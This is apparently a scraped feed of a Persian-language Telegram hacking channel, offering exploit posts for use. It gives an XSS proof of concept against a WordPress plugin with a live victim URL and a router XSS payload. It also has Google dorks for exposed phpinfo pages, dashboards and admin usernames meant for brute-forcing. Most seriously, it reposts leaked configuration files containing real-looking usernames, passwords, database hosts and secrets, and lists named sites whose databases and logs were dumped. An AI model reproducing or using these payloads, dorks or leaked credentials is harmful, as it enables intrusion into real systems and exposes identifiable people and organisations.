0Day.Today | Learn Exploit | Zero World | Dark web |
18.7K subscribers
1.23K photos
123 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
#`Exploit Title` : Wordpress Plugins flipbox Cross Site Scripting (XSS)
/————start :
#`Google Dork` : inurl:/wp-content/plugins/flipbox


#`Description` :
این اسیب پذیری در بخش view.php سایت میباشید و هرچیزی که بعد از view.php بیاید برای شما در سایت نمایش میدهد.

#`Poc` :
با روش زیر اکسپلویت رو انجام بدید :
view.php?pdf=<html><h1>Hacked by X0P4SH4</h1>

#`Example` :
https://www.rendezvous-carnetdevoyage.com/wp-content/plugins/flipbox/view.php?pdf=%3Chtml%3E%3Ch1%3EHacked%20by%20X0P4SH4%3C/h1%3E
———————
T.mE/LeaRNEXploIT
#Dork - #Find #PHPINFO
======================
Dork :
intext:"PHP Version " ext:php intext:"disabled" intext:"Build Date" intext:"System" intext:"allow_url_fopen"
——
Example :
http://veconlab.econ.virginia.edu/phpinfo.php
======================
@LearnExploit
Forwarded from اتچ بات
#Dork - #Find #Publice #Servers
/————-/
[+]Dork:
intext:"Build dashboard" intext:"Project" intext:"Plan" intext:"Build"
—————
[+]Info:
با این دورک شما میتونید سرور های پابلیک مثل dashboard رو پیدا کنید.
همچنین این دورک به شما کمک میکند که فایل های مهمی مانند Log.txt هم دسترسی داشته باشید.
————-
[+]Example:
https://messir.uni.lu/bamboo/deploy/viewDeploymentResult.action?deploymentResultId=46170129
/—————/
T.me/LearnExploit
:::: #AppConfig - #Github - #GitLab ::::
——————————————————
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
</startup>
<appSettings>
<add key="URL" value="https://hclo365.sharepoint.com/sites/Academy/ING" />
<add key="AcademyConfig" value="AcademyConfig" />
<add key="AcademyMember" value="ING Visitors" />
<add key="UserName" value="Sudipta_b@hcl.com" />
<add key="EncryptKey" value="123"/>
<add key="Password" value="fWSqCZ2WdCbDBbY9gSPuadIY3pPhgzfCQGRQwZUdeZU=" />
<add key="ClientSettingsProvider.ServiceUri" value="" />
</appSettings>
<system.web>
<membership defaultProvider="ClientAuthenticationMembershipProvider">
<providers>
<add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />
</providers>
</membership>
<roleManager defaultProvider="ClientRoleProvider" enabled="true">
<providers>
<add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86400" />
</providers>
</roleManager>
</system.web>
</configuration>
——————————————
فک نکنم دیگه نیاز به توضیح باشه...
=== > @LearnExploit
:::: #AppConfig - #Github - #GitLab ::::
------------------
Fiti.app -[
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<connectionStrings>
<add name="AutoScoutDB" providerName="System.Data.SqlClient"
connectionString="user id=marc;password=marc;server=10.176.129.40;Integrated Security=no;database=eCommerce;connection timeout=30" />
</connectionStrings>
</configuration>
]-
===========
t.me/learnexploit
سایت hackertest.net
یک سایت هست برای تست توانایی هکر ها دارای 20 مرحله هستش
هر روز 3 مرحله رو با هم میریم
@soheileast
==========
Channel = @LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
سایت hackertest.net یک سایت هست برای تست توانایی هکر ها دارای 20 مرحله هستش هر روز 3 مرحله رو با هم میریم @soheileast ========== Channel = @LearnExploit
#Pentesting - #Part 1 - #hackertest_Net
—————————————————
سلام دوستان این بخش نیاز به رکورد فیلم نداشت و این بخش رو توضیح میدم.
مراحل :
1)
وارد سورس پیج شید
== >
اگر با اندروید هستید متن زیر رو پشت Url سایت قرار دهید .
view-source:
به سورت زیر :
view-source:http://www.hackertest.net/
<==
2 )
بخش زیر رو در صفحه پیدا کنید :

<script language=JavaScript>
{
var a="null";
function check()
{
if (document.a.c.value == a)
{
document.location.href="http://www.hackertest.net/"+document.a.c.value+".htm";
}
else
{
alert ("Try again");
}
}
}
</script>
در اسکریپ بالا اپدا یک متغییر تعریف میکنه و مقدار null رو به اون میده
بعدش میاد میگه که اگر از کل صفحه مقدار برار a ینی همون null بود کد زیر رو برامون اجرا کن :
document.location.href="http://www.hackertest.net/"+document.a.c.value+".htm";
تو این کد به ما میگه که اگر مقدار درست بود مارو به صفحه ی
document.a.c.value = a or null
http://www.hackertest.net/null.htm
هدایت کن
——————————-
T.me/LearnExploit
0Day.Today Boy's
Forwarded from اتچ بات
#Pentesting - #Part 2 - #hackertest_Net
————————-
سلام خدمت دوستان
قسمت دوم اموزش
hackertest
نیز اماده شد.

توضیحات کامل در داخل فیلم گفته شده
فقط تنها نکته ای باید توجه کنیداینه که :

پسورد
131
نیست
بلکه
l3l
هست.
—————————
T.me/LeranExploit
0Day.Today Boy's
#Target #wp #Database
——————————
Target :
https://www.carisma.net/
\-------------\
Database :
yon.ir/SPRfx
\-------------\
file size : 1.6G
——————————-
T.me/LearnExploit
Forwarded from اتچ بات
#Target #wp #Database
——————————
Target :
http://geneseoschools.org/
——————————-
T.me/LearnExploit
#Xss #Bug In #Router (Tenda D152 ADSL Router)
و اینبار اسیب پذیری xss در روتر tenda :
برای مشاهده ی این اسیب پذیری وارد روتر
(Wifi Router Gateway)
خود شید :
http://Target/login
——
سپس به مسیر زیر برید :
General Setup --> Wireless --> Basic Settings
بعد SSID رو به
<script>alert("LearnExploit")</script>
تغییر بدید و پیج رو رفرش کنید :)
پاپ اپ LearnExploit قابل رویت است برای شما...
————————
T.me/LearnExploit
0Day.Today Boy's
#Dork | Get Username admin site or forums...
————————-
#Dork :
inurl:/profile.php?lookup=1

|Descriptions : |
دوستان این دورک user ادمین سایت رو میده
و شما میتونید از ان برای bruteforce استفاده کنید تا پسورد سایت رو بدست بیارید.
—————————
#GHDB
@LearnExploit
is.muni.cz.auth.log.txt
10.4 MB
#Target #Log #File :
————————-
Target :
https://is.muni.cz
————————-
@LearnExploit
#Datbase #User #Passwd
============================
parameters:
database_driver: pdo_mysql
database_host: 127.0.0.1
database_port: null
database_name: basededattos
database_user: ruben
database_password: calipo123
mailer_transport: smtp
mailer_host: rubenpeib@gmail.com
mailer_user: null
mailer_password: null
locale: en
secret: 94f06f449a955c057befc3043d374fc9c0b21329
database_path: null
==============================
=== > see : http://159.149.130.120/ruben/app/config
============================================
@LearnExploit